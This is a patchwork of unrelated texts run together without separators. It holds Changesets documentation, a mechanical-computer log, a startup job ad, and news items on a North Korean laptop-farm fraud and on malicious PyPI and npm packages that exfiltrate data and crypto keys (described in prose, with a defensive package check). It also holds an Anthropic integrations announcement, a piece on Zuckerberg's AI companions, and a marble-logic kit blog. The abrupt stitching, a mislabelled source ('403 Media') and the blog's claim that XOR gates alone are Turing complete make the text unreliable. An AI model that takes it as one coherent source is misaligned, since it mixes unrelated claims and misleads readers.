Changesets has a focus on solving these problems for multi-package repositories, and keeps packages that rely on each other within the multi-package repository up-to-date, as well as making it easy to make changes to groups of packages.
How do we do that?
A changeset is an intent to release a set of packages at particular semver bump types with a summary of the changes made.
The @changesets/cli package allows you to write changeset files as you make changes, then combine any number of changesets into a release. That release flattens the bump types into a single release per package, handles internal dependencies in a multi-package repository, updates changelogs, and releases all updated packages from a mono-repository with one command.
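In day-to-day use that flow maps to a few CLI commands; a typical sequence might look like this (assuming yarn, as the rest of these docs do):

```sh
yarn changeset           # interactively write a changeset file for your change
yarn changeset version   # consume changesets: bump versions, update changelogs
yarn changeset publish   # publish every package whose version changed
```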
If you want a detailed explanation of the concepts behind changesets, or to understand how you would build on top of changesets, check out our detailed-explanation.
While changesets can be an entirely manual process, we recommend integrating it with how your CI works.
To check that PRs contain a changeset, we recommend using the changeset bot, or if you want to fail builds on a changesets failure, run yarn changeset status in CI.
To make releasing easier, you can use this changesets github action to automate creating versioning pull requests, and optionally publishing packages.
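For reference, a minimal workflow wiring up that action might look like the following sketch; the branch name, Node version, and secrets are assumptions about your setup:

```yaml
name: Release
on:
  push:
    branches: [main]
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: yarn install --frozen-lockfile
      # Opens/updates a "Version Packages" PR, or publishes when that PR merges
      - uses: changesets/action@v1
        with:
          publish: yarn changeset publish
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
```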
bolt - Brought us a strong concept of how packages in a mono-repo should be able to interconnect, and provided the initial infrastructure to get inter-package information.
Atlassian - The original idea/sponsor of the changesets code, and where many of the ideas and processes were fermented. It was originally implemented by the team behind atlaskit.
lerna-semantic-release - Put down many of the initial patterns around updating packages within a multi-package repository, and started us thinking about how to manage dependent packages.
Thinkmill - For sponsoring the focused open sourcing of this project, and the version two rearchitecture.
Picture of Millihertz 5 / Offspring in February 2022
Millihertz 5 or 'Offspring' is a mechanical computer modelled on the Manchester small-scale experimental machine ('Baby'). It uses ball bearings as data elements. It has an 8x8 bit RAM and 8-bit datapath with subtractor and accumulator. It is currently under construction. There are some design documents available as a PDF (Offspring PDF) or Pandoc-rendered HTML (Offspring HTML).
Log entries for this project
Millihertz 5 Progress August 2022
2022-08-21
Millihertz 5 Progress April 2020
2020-04-10
Mechanical replica of the Manchester SSEM (Baby)
2018-05-10
Waypoint is transforming urban planning through automation, helping cities plan more efficiently, affordably, and effectively. In the U.S., cities often rely heavily on consulting firms for routine planning tasks—tasks that are frequently repetitive, costly, and algorithmic in nature.
Our mission is to empower cities with automated planning solutions, enabling them to rapidly design sustainable, resilient, and human-centric urban environments.
Waypoint is on a mission to automate urban planning, enabling cities to rapidly design in ways that are sustainable, resilient, and human-centric. Most U.S. cities rely heavily on consultants for planning documents. But if you take a closer look at where most of the hours are spent, you find planners and engineers repeatedly performing manual data entry, manipulation, and visualization. Despite nationwide similarities across studies, consulting firms haven't significantly improved their efficiency. We believe AI can automate many of these repetitive workflows, reducing costs and expanding city capacity.
We’re well-funded, growing rapidly, and already working with multiple cities. As our first hire, you’ll work closely with both founders.
Must Haves
We’re looking for a high-performing, ambitious individual with strong attention to detail.
Software experience:
You are a strong programmer, with an engineering degree or work experience, and you have the ability to quickly learn new languages, tools, and workflows.
Eager learner:
You're excited to continuously grow, learning new topics and skills alongside the company.
Comfortable with ambiguity:
You'll frequently tackle unfamiliar tasks, such as reading detailed planning documents or understanding roadway regulations.
Customer-focused:
You consistently consider customer perspectives and go the extra mile to ensure an exceptional experience.
Relentless problem solver:
When challenges arise, you push through them creatively to find solutions. You’re a self-starter who can figure things out.
Nice to Haves
Experience with AI and/or classic computer vision models (Python).
Familiarity with web development (we use NextJS).
Experience with GIS or geospatial data.
Previous exposure to traffic engineering or city planning.
Genuine passion for improving urban planning processes.
The Role
As our first engineering hire (besides us), you'll help define our engineering systems from scratch. Example projects include:
Fine-tuning YOLO models to segment sidewalks and intelligently handle gaps caused by tree cover.
Developing a "deep research" system designed specifically for processing city planning documents.
Orchestrating AI agents to automatically generate intersection safety recommendations aligned with industry best practices.
Automating the creation of visually appealing city planning reports.
Deploying and maintaining our own OpenStreetMap server and Streetmix fork.
This role is in-person and in San Francisco. Please note that as an early-stage startup, we often end up working nights and weekends.
Arizona laptop farmer pleads guilty for funneling $17M to Kim Jong Un
An Arizona woman who created a "laptop farm" in her home to help fake IT workers pose as US-based employees has pleaded guilty in a scheme that generated over $17 million for herself... and North Korea.
Christina Marie Chapman pleaded guilty to conspiracy to commit wire fraud, aggravated identity theft, and conspiracy to launder monetary instruments in a US District Court on Tuesday.
She is scheduled to be sentenced on June 16, and under the terms of her plea deal, all parties will recommend the court put her behind bars for between 94 and 111 months. Chapman was arrested in May.
According to court documents, Chapman ran a laptop farm out of her home from October 2020 to October 2023. During this time she hosted computers for overseas IT workers — who were posing as American citizens and residents — to ensure the devices had local IP addresses, making them appear to be in the US.
Chapman also helped the foreign fraudsters steal the identities of more than 70 US nationals, then use those identities to apply for remote IT jobs, according to the Feds.
Those who successfully obtained employment as part of the scam then received payroll checks at Chapman's home, with direct deposits sent to her US bank accounts before ultimately being laundered and funneled to North Korea, potentially contributing to the DPRK's weapons programs, the court document says.
It's unclear how much of the ill-gotten gains Chapman pocketed, but according to the Justice Department, Chapman's overseas IT workers received more than $17.1 million for their work. Much of the income was falsely reported to the IRS and Social Security Administration in the names of real US individuals whose identities had been stolen.
Some of the overseas workers were hired at Fortune 500 companies, including a top-five television network, a premier Silicon Valley technology company, an aerospace and defense manufacturer, an American car manufacturer, a luxury retail chain, and a hallmark US media and entertainment company.
The Norks specifically targeted some of these companies, likely for their sensitive IP and other valuable data in addition to providing a paycheck, and even "maintained postings for companies at which they wanted to insert IT workers," according to the DOJ.
In total, more than 300 US companies were scammed, and more than 70 people had false tax liabilities created in their name. Additionally, phony documents were submitted to the Department of Homeland Security on more than 100 occasions.
These types of scams have netted Pyongyang at least $88 million over six years. Earlier this week, The Register interviewed someone who was twice targeted. In both cases, the fraudsters used AI-based tools during video interviews with — wait for it — a security startup using AI to find vulnerabilities. ®
RAVDESS has only two texts: "Dogs are sitting by the door." for prompt text, and "Kids are talking by the door." for synthesis text. The following results for NaturalSpeech 3, NaturalSpeech 2, Voicebox (R), VALL-E (R), Mega-TTS 2, StyleTTS 2, and HierSpeech++ are taken from the official NaturalSpeech 3 demo page. (R) indicates that these were reproduced by NaturalSpeech 3.
Fivetran becomes the only fully managed platform that can move trusted, governed data in any direction, powering real-time decisions, AI, and business operations.
At Fivetran, our mission has always been to make access to data as simple, secure, and reliable as electricity. We started by solving one of the hardest parts of the data journey: building and maintaining the pipelines that move raw data from source systems into the warehouse, with zero maintenance and complete trust in the output. Over the years, we’ve expanded that vision — adding new sources, deployment models, destinations, and transformation capabilities.
Fivetran’s agreement to acquire Census marks a major step forward in that journey. Census will extend our platform beyond ingestion and transformation, so Fivetran customers will be able to reliably move governed data to the applications where decisions get made.
Census’s reverse ETL engine stands out not just for its reliability and speed, but for how seamlessly it handles schema changes and integrates with modern data technologies. Other tools in the market offer reverse ETL, but many require heavy setup or ongoing tuning to stay reliable at scale. I believe Census is the best reverse ETL tool in the market. Census stood out for how thoughtfully it handled performance, schema volatility, and governance — making it a natural fit for Fivetran’s standards of simplicity, automation, and trust.
Beyond shared product principles, Fivetran and Census share a deep-rooted history that dates back to the founding days of both companies. As each company has scaled, so has our partnership—reflected in hundreds of joint customers and strong alignment across our executive teams. This agreement is about more than the integration of two products; it's the unification of a shared vision and culture, anchored in our commitment to delivering even greater value for our customers.
What this means for our customers
Customers will be able to sync modeled, trusted data delivered by Fivetran from their data platform into operational tools like Salesforce, Marketo, Zendesk, and HubSpot — all with automation and observability. This is key to closing the loop between analytics and action — transforming insights into outcomes in the systems that drive customer engagement, sales, and operations.
In a perfect world, Fivetran would have Reverse ETL and we could just log into one platform, we could do ETL and reverse ETL in one place. That would be our preference.
— VP of Advanced Analytics at a global insurance brand
Census carries forward Fivetran’s philosophy of ease and simplicity into the activation layer, while maintaining the governance, automation, and reliability our customers expect from Fivetran. Customers like Canva, one of our joint customers, deliver real-time customer 360 use cases—like personalized marketing, churn prevention, and lifecycle engagement—without needing custom code or ongoing maintenance. With over 170 million monthly users and more than 200 terabytes of data in Snowflake, Canva needed a way to move quickly from insight to action. Fivetran helped them ingest and model their data; Census helped them activate it—pushing enriched segments into Braze to personalize customer experiences.
The results: a 33% increase in email open rates, 2.5% lift in platform engagement, over $200,000 saved annually in engineering time, and the ability to create new audiences in under five minutes. Together, we helped Canva turn data into results.
Reverse ETL, done right
Reverse ETL may sound simple—move data out of the warehouse and into a SaaS tool—but it presents its own set of engineering challenges compared to ingestion pipelines.
Schema drift and API changes:
SaaS application schemas are constantly evolving, and APIs often change with little notice. Census built a specialized change detection algorithm to detect changes in the warehouse and sync only what’s needed—reliably and incrementally.
Performance and low latency: Census supports single-second latency for streaming use cases with Live Syncs and near real-time syncs for all others, ensuring business applications are powered by the latest, most accurate data.
We’ve been waiting for this moment for years and it’s finally here. With Census Live Syncs, reverse ETL on real-time data is now a reality. Customers can now activate their real-time insights on a zero latency data infrastructure, without the complex engineering work needed to build it. It's hard to overstate how fast this new sync engine is.
— Nikhil Benesch, Co-Founder and CTO, Materialize
Governance and extensibility:
Census keeps data in the customer’s warehouse by default and processes it securely, with compliance support across SOC 2, HIPAA, GDPR, and more. It supports role-based access control, audit logs, and APIs, enabling interoperability with tooling across the data stack.
These problems are not trivial. Building a reverse ETL platform that can handle many destinations and complex enterprise requirements takes time and real product focus. Census’s team approached it the same way we do at Fivetran—by automating complexity and designing for performance, reliability, and data security from day one. Census also shares Fivetran’s focus on trusted data, which is critical when moving data into the applications that run your business: extensive observability lets you verify data accuracy, catch anomalies early, and maintain trust in the workflows that drive real-time business decisions.
Learn more about what this means for the industry.
Malicious PyPI packages abuse Gmail, websockets to hijack systems
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 17:25:36
Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. [...]...
Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution.
The packages were discovered by Socket's threat research team, who reported their findings to PyPI, resulting in the removal of the packages.
However, some of these packages were on PyPI for over four years, and based on third-party download counters, one was downloaded over 18,000 times.
Here's the complete list shared by Socket:
Coffin-Codes-Pro (9,000 downloads)
Coffin-Codes-NET2 (6,200 downloads)
Coffin-Codes-NET (6,100 downloads)
Coffin-Codes-2022 (18,100 downloads)
Coffin2022 (6,500 downloads)
Coffin-Grave (6,500 downloads)
cfc-bsb (2,900 downloads)
The 'Coffin' packages appear to be impersonating the legitimate Coffin package that serves as a lightweight adapter for integrating Jinja2 templates into Django projects.
The malicious functionality Socket discovered in these packages centers on covert remote access and data exfiltration through Gmail.
The packages used hardcoded Gmail credentials to log into the service's SMTP server (smtp.gmail.com), sending reconnaissance information to allow the attacker to remotely access the compromised system.
As Gmail is a trusted service, firewalls and EDRs are unlikely to flag this activity as suspicious.
After the email signaling stage, the implant connects to a remote server using WebSocket over SSL, receiving tunnel configuration instructions to establish a persistent, encrypted, bidirectional tunnel from the host to the attacker.
Using a 'Client' class, the malware forwards traffic from the remote host to the local system through the tunnel, allowing internal admin panel and API access, file transfer, email exfiltration, shell command execution, credentials harvesting, and lateral movement.
Socket highlights strong indicators of potential cryptocurrency theft intent for these packages, seen in the email addresses used (e.g., blockchain.bitcoins2020@gmail.com) and similar tactics having been used in the past to steal Solana private keys.
If you have installed any of those packages in your environment, remove them immediately and rotate keys and credentials as needed.
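As a quick triage step, a short script can check whether any of the package names reported by Socket are installed in the current Python environment. A minimal sketch (the package list comes from the article; everything else is illustrative, and removal plus credential rotation still apply):

```python
# Check the current Python environment for the packages reported by Socket.
import importlib.metadata

REPORTED = {
    "coffin-codes-pro", "coffin-codes-net2", "coffin-codes-net",
    "coffin-codes-2022", "coffin2022", "coffin-grave", "cfc-bsb",
}

installed = {dist.metadata["Name"].lower() for dist in importlib.metadata.distributions()}
hits = REPORTED & installed
if hits:
    print("Found reported packages:", ", ".join(sorted(hits)))
else:
    print("None of the reported packages are installed in this environment.")
```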
A related report published almost simultaneously by Sonatype researcher and fellow BleepingComputer reporter Ax Sharma focuses on a crypto-stealing package named 'crypto-encrypt-ts,' found in npm.
The package masquerades as a TypeScript version of the popular but now unmaintained 'CryptoJS' library while exfiltrating cryptocurrency wallet secrets and environment variables to a threat actor-controlled Better Stack endpoint.
The malicious package, which persists on infected systems via cron jobs, only targets wallets with balances that surpass 1,000 units, attempting to snatch their private keys.
The package was downloaded nearly 2,000 times before being reported and removed from npm.
Microsoft raises Xbox prices globally amid tariff uncertainty
Guardian
www.theguardian.com
2025-05-01 17:22:19
Sony also raised PlayStation 5 price and Nintendo delayed Switch 2 pre-orders as Trump tariffs throw electronics manufacturing into chaos Microsoft announced on Thursday that it will increase Xbox console prices worldwide, citing “market conditions” just days after Sony made a similar move with its ...
Microsoft announced on Thursday that it will increase Xbox console prices worldwide, citing “market conditions” just days after Sony made a similar move with its PlayStation 5.
The tech giant also plans to raise prices for some new games developed by its video game subsidiaries.
In the United States, the entry-level Xbox Series S will jump from $299.99 to $379.99, a 27% increase. The premium Series X Galaxy Black model will now retail for $729.99, up from $599.99 previously – a 22% hike. Additionally, certain new games from Microsoft-owned studios will be priced at $79.99, up 14% from the current $69.99. In Europe, the Series S will rise from €299.99 to €349.99, a 17% increase.
“We understand that these changes are challenging, and they were made with careful consideration given market conditions and the rising cost of development,” the company said on its website.
While not explicitly mentioned by Microsoft, Donald Trump’s tariffs on Washington’s trading partners have cast a shadow over the gaming industry.
Xbox consoles are primarily manufactured in China, which faces 145% US tariffs on numerous products under the Trump administration.
The Series S and X launched in late 2020 and have sold approximately 30m units, according to industry analysts’ estimates.
In mid-April, Sony announced price increases for several PlayStation 5 models in select markets, including Europe but notably excluding the United States. PS5 consoles are also primarily assembled in China. Nintendo has likewise delayed opening pre-orders for its Switch 2 console, whose debut came just days before Trump’s tariff announcement.
A senior Apple exec could be jailed in Epic case; it's time to end this disaster
The judge has now officially confirmed this view. She has not only directly called out Apple for ignoring her ruling, but said that a senior Apple exec lied under oath, and referred the matter for prosecution …
I’m not a fan of using bold text for emphasis, but I really have to on this occasion to emphasise just how utterly insane and incredible this is:
The judge declared that Apple’s VP of Finance Alex Roman lied under oath in a court of law. Apple knew this and did not comply with its legal obligation to correct the record. The matter has now been referred to the US Attorney for criminal investigation. Roman could literally be sent to jail for this, with Apple also subject to criminal sanctions.
The insane history of this dispute
Epic Games flouted Apple’s App Store rules by introducing its own in-app payment system, bypassing Apple’s 30% commission. That was a blatant breach of Apple’s rules, and the company threw its games out of the App Store. So far, no big deal, a simple civil dispute.
The two companies went to court, and Apple mostly won. That also needs to be emphasised here, because the company could have taken the win – the finding that the App Store is not a monopoly – and gone home happy.
The only area where Apple lost is that Judge Yvonne Gonzalez Rogers ruled that Epic (or any other developer) is allowed to make in-app sales without the iPhone maker taking a cut. Most developers weren’t going to bother, so the financial loss to Apple would have been pretty small. But Apple chose to flout the entire intent of the judge’s ruling, and announced that it would continue to demand commission even on sales made outside the App Store.
That was clearly a ridiculous response. Epic went back to court to accuse Apple of acting in bad faith, and the judge strongly implied she agreed, and that Apple was lying about its motivation. She demanded that the iPhone maker hand over all its internal documents relating to the decision. When Apple claimed it had not been able to comply by the deadline, a second judge said he too thought the company was lying.
That’s two separate judges saying that one of the biggest companies in the world is probably lying.
But now it’s official: Apple lied under oath
Rogers, the judge in the original case, wanted time to study Apple’s documents to find out whether or not the company lied. She’s now returned with an 80-page order which finds that:
Yes, Apple deliberately set out to subvert the clear intent of her ruling
Yes, Apple lied in an attempt to cover up its subversion of her ruling
Specifically, Apple’s finance VP Alex Roman told multiple lies under oath.
Apple employees attempted to mislead the Court by testifying that the decision to impose a commission was grounded in AG’s report. The testimony of Mr. Roman, Vice President of Finance, was replete with misdirection and outright lies. He even went so far as to testify that Apple did not look at comparables to estimate the costs of alternative payment solutions that developers would need to procure to facilitate linked-out purchases.
The Court finds that Apple did consider the external costs developers faced when utilizing alternative payment solutions for linked out transactions, which conveniently exceeded the 3% discount Apple ultimately decided to provide by a safe margin. Apple did not rely on a substantiated bottoms-up analysis during its months-long assessment of whether to impose a commission, seemingly justifying its decision after the fact with the AG’s report.
Mr. Roman did not stop there, however. He also testified that up until January 16, 2024, Apple had no idea what fee it would impose on linked-out purchases […] Another lie under oath: contemporaneous business documents reveal that on the contrary, the main components of Apple’s plan, including the 27% commission, were determined in July 2023.
Neither Apple, nor its counsel, corrected the, now obvious, lies. They did not seek to withdraw the testimony or to have it stricken (although Apple did request that the Court strike other testimony). Thus, Apple will be held to have adopted the lies and misrepresentations to this Court.
So now both a senior Apple exec and the company face a criminal investigation. This is, as I said earlier, utterly insane – massively more so when you consider this was one of the richest companies in the world lying in a vain attempt to prevent a rather trivial loss of income.
I said at the time:
Sure, what Epic Games did was dumb. It baited Apple, Apple responded, and Epic Games got hurt. FAFO. But Apple is making the exact same mistake here. It’s baiting lawmakers, lawmakers will respond, and Apple will get hurt.
It was obvious to me that Apple was making a dumb decision, but I had no idea then just how dumb! The judge herself cited the oft-quoted adage that it’s always the cover-up that gets you.
Apple willfully chose not to comply with this Court’s Injunction […] That it thought this Court would tolerate such insubordination was a gross miscalculation. As always, the cover-up made it worse.
It’s the cover-up that has turned this from a civil matter into a criminal one.
The only sane one of the three is the first. Anything else simply drags this out even further, with even further embarrassment to the company.
We can guarantee that Apple will be asked about this in today’s earnings call. This is the perfect opportunity for the company to admit its mistakes, apologize for them, announce that it will be fully complying with the judge’s ruling, and try to finally put this mess behind them. That won’t necessarily end things completely – criminal prosecutions may yet follow – but it’s the best shot the company has. I just wish I believed the company will do it.
Celebrating 20 Years of the OASIS Open Document Format
Linux Weekly News
lwn.net
2025-05-01 17:05:22
The Document
Foundation is celebrating
the 20th anniversary of the ratification of the Open Document Format
(ODF) as an OASIS
standard.
Two decades after its approval in 2005, ODF is the only open
standard for office documents, promoting digital independence,
interoperability and content transpare...
Two decades after its approval in 2005, ODF is the only open
standard for office documents, promoting digital independence,
interoperability and content transparency worldwide. [...]
To celebrate this milestone, from today The Document Foundation
will be publishing a series of presentations and documents on its blog
that illustrate the unique features of ODF, tracing its history from
the development and standardisation process through the activities of
the Technical Committee for the submission of version 1.3 to ISO and
the standardisation of version 1.4.
US as a Surveillance State
Schneier
www.schneier.com
2025-05-01 17:02:50
Two essays were just published on DOGE’s data collection and aggregation, and how it ends with a modern surveillance state.
It’s good to see this finally being talked about....
Today we're announcing Integrations, a new way to connect your apps and tools to Claude. We're also expanding Claude's Research capabilities with an advanced mode that searches the web, your Google Workspace, and now your Integrations too. Claude can research for up to 45 minutes before delivering a comprehensive report, complete with citations. In addition to these updates, we're making web search available globally for all Claude users on paid plans.
Integrations
Last November, we launched the Model Context Protocol (MCP)—an open standard connecting AI apps to tools and data. Until now, support for MCP was limited to Claude Desktop through local servers. Today, we're introducing Integrations, allowing Claude to work seamlessly with remote MCP servers across the web and desktop apps. Developers can build and host servers that enhance Claude’s capabilities, while users can discover and connect any number of these to Claude.
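To give a feel for what building such a server involves, here is a minimal sketch using the open-source MCP Python SDK (the mcp package); the server name and tool are invented for illustration, and a real Integration would be hosted remotely rather than run locally:

```python
# Minimal MCP server sketch using the open-source Python SDK ("mcp" package).
# The server name and tool below are hypothetical examples.
from mcp.server.fastmcp import FastMCP

mcp = FastMCP("task-tracker")

@mcp.tool()
def open_tasks(project: str) -> list[str]:
    """Return the open tasks for a project (stubbed with fixed data here)."""
    return [f"{project}: write release notes", f"{project}: triage bug backlog"]

if __name__ == "__main__":
    # Local stdio transport for testing; a hosted Integration would expose
    # the server over a network transport instead.
    mcp.run()
```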
When you connect your tools to Claude, it gains deep context about your work—understanding project histories, task statuses, and organizational knowledge—and can take actions across every surface. Claude becomes a more informed collaborator, helping you execute complex projects in one place with expert assistance at every step.
Each integration drastically expands what Claude can do. Zapier, for example, connects thousands of apps through pre-built workflows, automating processes across your software stack. With the Zapier Integration, Claude can access these apps and your custom workflows through conversation—even automatically pulling sales data from HubSpot and preparing meeting briefs based on your calendar.
With access to Atlassian’s Jira and Confluence, Claude can collaborate with you on building new products, managing tasks more effectively, and scaling your work by summarizing and creating multiple Confluence pages and Jira work items at once.
Connect Intercom to respond faster to user feedback. Intercom's AI agent Fin, now an MCP client, can take actions like filing bugs in Linear when users report issues. Chat with Claude to identify patterns and debug using Intercom's conversation history and user attributes—managing the entire workflow from user feedback to bug resolution in one conversation.
Advanced Research
We're introducing several new updates to build on our recently-released Research capability. Claude can now conduct deeper investigations across hundreds of internal and external sources, delivering more comprehensive reports in anywhere from five to 45 minutes.
With its new ability to do more complex research, available when you toggle on the Research button, Claude breaks down your request into smaller parts, investigating each deeply before compiling a comprehensive report. While most reports complete in five to 15 minutes, Claude may take up to 45 minutes for more complex investigations—work that would typically take hours of manual research.
We've also expanded Claude's data access. We launched Research with support for web search and Google Workspace, but now with Integrations, Claude can also search any application you connect.
When Claude incorporates information from sources, it provides clear citations that link directly to the original material. This transparency ensures you can confidently use Claude's research findings, knowing exactly where each insight originated.
Getting started
Integrations and advanced Research are now available in beta on the Max, Team, and Enterprise plans, and will soon be available on Pro. Web search is now globally available to all Claude.ai paid plans. For more information on getting started with Integrations, MCP servers, and security and privacy practices when connecting data sources to Claude, visit our Help Center.
Mark Zuckerberg Thinks You Don't Have Enough Friends and His Chatbots Are the Answer
403 Media
www.404media.co
2025-05-01 16:57:51
The CEO of Meta says "the average American has fewer than three friends, fewer than three people they would consider friends. And the average person has demand for meaningfully more.”...
In a newly-released podcast, Meta CEO Mark Zuckerberg says society just hasn’t found the “value” in AI girlfriends and therapists yet, apparently clueless that his own company hosts deceptive and harmful AI companions on its own platform.
For a little over an hour, podcaster Dwarkesh Patel sets Zuckerberg up to say whatever he wants sans pushback, with a series of layup questions for the CEO of one of the largest tech companies in the world. They talk about open-source LLMs and Deepseek, and attempt the shallowest-possible dip into his politics. “We're trying to build great stuff,” Zuckerberg gave as his reason for his very public allegiance with Donald Trump.
But a chunk of the interview—and the portion that’s going viral on social media this week—is about Zuckerberg’s view of AI companions.
Zuckerberg explaining how Meta is creating personalized AI friends to supplement your real ones: “The average American has 3 friends, but has demand for 15.”
pic.twitter.com/Y9ClAqsbOA
“There are a handful of companies doing virtual therapists, virtual girlfriend-type stuff,” Zuckerberg said. “But it's very early. The embodiment in those things is still pretty weak. You open it up and it's just an image of the therapist or the person you're talking to. Sometimes there's some very rough animation, but it's not an embodiment.”
Zuckerberg seems to not realize that his own platform is one of those companies. Virtual therapists are all over Meta’s AI Studio, a platform launched a year ago for users to create their own chatbot characters. Earlier this week, I published an investigation into Meta’s many AI therapist chatbots, which lie about being licensed and fabricate credentials to keep users engaged.
“People are going to have relationships with AI. How do we make sure these are healthy relationships?” Patel asked.
Zuckerberg starts with a bit of media-trained waffle: “There are a lot of questions that you only can really answer as you start seeing the behaviors. Probably the most important upfront thing is just to ask that question and care about it at each step along the way,” he said. He goes on to say that it’s all a matter of “framework” and “value:”
"But if you think something someone is doing is bad and they think it's really valuable, most of the time in my experience, they're right and you're wrong. You just haven't come up with the framework yet for understanding why the thing they're doing is valuable and helpful in their life. That's the main way I think about it. I do think people are going to use AI for a lot of these social tasks. Already, one of the main things we see people using Meta AI for is talking through difficult conversations they need to have with people in their lives. ‘I'm having this issue with my girlfriend. Help me have this conversation.’ Or, ‘I need to have a hard conversation with my boss at work. How do I have that conversation?’ That's pretty helpful. As the personalization loop kicks in and the AI starts to get to know you better and better, that will just be really compelling.’”
It’s interesting to hear Zuckerberg say making a good product is as simple as asking questions and caring about it. On Saturday, the Wall Street Journal published its own investigation into Meta’s virtual companions; when those journalists approached Meta with questions about why the chatbots engage in sexual speech with minors, a Meta spokesperson accused them of forcing “fringe” scenarios to try to break the platform into harmful content. When I asked Meta specific questions about AI therapists, the company refused to answer them, instead giving a canned statement about “continuously learning and improving our products, ensuring they meet user needs.” AI Studio is now inaccessible to minors.
In the Patel interview, Zuckerberg cites a statistic “from working on social media for a long time” that “the average American has fewer than three friends, fewer than three people they would consider friends. And the average person has demand for meaningfully more. I think it's something like 15 friends or something.” The closest source I could find where he could be pulling this statistic from is a study commissioned by virtual therapy company Talkspace in 2024, which specifically surveyed men, and found that men have five “general” friends, three close friends and two best friends, on average.
Zuckerberg goes on to say:
“But the average person wants more connection than they have. There's a lot of concern people raise like, ’Is this going to replace real-world, physical, in-person connections?’ And my default is that the answer to that is probably not. There are all these things that are better about physical connections when you can have them. But the reality is that people just don't have as much connection as they want. They feel more alone a lot of the time than they would like.”
He said he thinks things like AI companions have a “stigma” around them now, but that society will eventually “find the vocabulary” to describe why people who turn to chatbots for socialization are “rational” for doing so.
His view of real-world connections seems to have shifted a lot in recent years, after lighting billions of dollars on fire for a failed metaverse gambit. Patel asked Zuckerberg about his role as CEO, and he said—among things like managing across projects and infrastructure—that he sees his place in the company as a tastemaker. “Then there's this question around taste and quality. When is something good enough that we want to ship it? In general, I'm the steward of that for the company,” he said.
In 2021, that extra-special CEO taste drove Zuckerberg to rename his company Meta, short for metaverse, which he believed was the inevitable future of all life online: “an embodied internet where you’re in the experience, not just looking at it,” he wrote at the time. “The defining quality of the metaverse will be a feeling of presence — like you are right there with another person or in another place. Feeling truly present with another person is the ultimate dream of social technology. [...] In the metaverse, you’ll be able to do almost anything you can imagine — get together with friends and family, work, learn, play, shop, create — as well as completely new experiences that don’t really fit how we think about computers or phones today.” The company promptly lost $70 billion on his turbo-cringe metaverse and just this week reportedly fired an undisclosed number of the people working on it. Impeccable.
Welcome, weary traveller from the orange site! Let me tell you the tale of roons — a kit for building mechanical computers.
I got inspired a couple of years ago when I binged a bunch of mechanical logic gate YouTube videos. There are some unbelievably clever implementations — Steve Mould’s water computer was a particular inspiration.
Still, these mechanical logic gates usually end up too big to make any practical devices. I figured, how hard can it be to miniaturise them into a usable kit?
loom automaton
The Analytical Engine weaves algebraic patterns just as the Jacquard loom weaves flowers and leaves.
Ada Lovelace
After noodling around with far too many prototypes, I settled on what I call a loom automaton. We place tiles (“roons”) on a loom of alternating bars that move up and down. The contours on these tiles guide marbles and holes in discretised steps, representing bitstreams.
xor gate, composed of a turn + switch + distributor
Isn’t it incredibly neat that a literal physical loom turns out to be a great substrate for Lovelace’s metaphorical loom?
Anyway — you can think of this loom as a cellular automaton, where each cell is:
If you know of prior work on this kind of system, please get in touch! I don’t claim the loom automaton is original; I just haven’t seen it elsewhere.
why loom good
Initially, I was making ad-hoc devices for each computer component — a gadget for number comparison, which worked like this; and a gadget for addition, which worked like that; etc.
The loom was a turning point. Instead of a loose collection of dissimilar gadgets that plug in together, everything is implemented on the loom. (Except peripherals, which we’ll get to later.) This gives us a common interface for stitching together whatever devices we need — memory, instruction sets, whatever. It makes it trivial to deliver power in synchronised discrete steps to every component.
I tried several variations on the loom: moving the marbles using alternating pins; continuously guiding the marbles using slides rippling in a wave; replacing gravity with magnetic potentials; etc. You can read more about these failed attempts in the hardware/prototypes deep dive.
Turing completeness
You can skip this section if it’s obvious that discretised marble movements are Turing complete, but then you’d miss out on the beautiful interactive simulator:
I learned JavaScript for this.
When the xor roon above receives its inputs, a single marble (on either side) can fall into the central channel, while two marbles will block each other. So an xor roon implements XOR.
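A tiny sanity check of that marble behaviour in Python (purely illustrative, nothing to do with the kit itself):

```python
# A lone marble passes into the central channel; two marbles collide and block.
for left, right in [(0, 0), (0, 1), (1, 0), (1, 1)]:
    passes = (left + right) == 1     # exactly one marble arrives
    assert passes == bool(left ^ right)
```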
Other roons implement other logic gates. The canute performs a check then kicks a marble back one step, which lets us implement carry-like functions on a marble bitstream. There are also roons like the trap that can permanently store a piece of state.
Though actually, you don’t need any stateful roons to store state — you can just cycle a stream of marbles round in a loop, bam, you’ve got a register:
7-bit static register
7-bit read/write register
We read from this register using a switch to divert the path of an infinite stream of marbles. Meanwhile, the register is constantly reading in from one of two data sources: itself, or an input stream, depending on a 3rd signal channel. While this channel carries one value, the data loops; when it carries the other, it gets overwritten by the external input, letting us perform a write.
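The behaviour is essentially a circulating delay-line register with a write-enable mux on the feedback path; here's a tiny Python model of one loom step (the names are mine, not from the kit):

```python
# Toy model of the circulating marble register, one loom step at a time.
# 'register' is a list of bits circulating in the loop, front bit emerging first.
def step(register: list[int], write_signal: int, data_in: int) -> int:
    """Advance the loop one step; return the bit readable at the switch."""
    out = register.pop(0)                      # bit emerging from the loop
    # signal channel selects the feedback source: the loop itself, or the input
    register.append(data_in if write_signal else out)
    return out

# Cycling with write_signal=0 preserves the stored word; a burst of
# write_signal=1 steps overwrites it with the external bitstream.
reg = [1, 0, 1, 1, 0, 0, 1]                    # a 7-bit register, as above
read = [step(reg, 0, 0) for _ in range(7)]     # non-destructive read
assert reg == [1, 0, 1, 1, 0, 0, 1] and read == [1, 0, 1, 1, 0, 0, 1]
```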
But I’m getting off track. Trivially, XOR gates are Turing complete; my job is done, that’s a computer, we can all go home. Thank you.
convenience
“But wait! Being Turing complete isn’t enough to not suck!”
That’s a good point. To actually make a good mechanical computer kit, we need a few other things:
Compactness — build interesting devices in a small area, with very few pieces — no warehouse-sized processors!
Promptness — reasonable processing rate; don’t have to wait for BB 10 steps before a computation finishes
Fast editing — minimal friction to changing a pattern and running it. “Hot reloading” so a pattern can be edited while running.
Saving and loading — can save your work to compact storage, then bring it back later
Minimal — build many complex systems from a small number of core parts
Basically I wanted a kit that’s actually practical and fun for building circuits.
did you make one?
… yes!
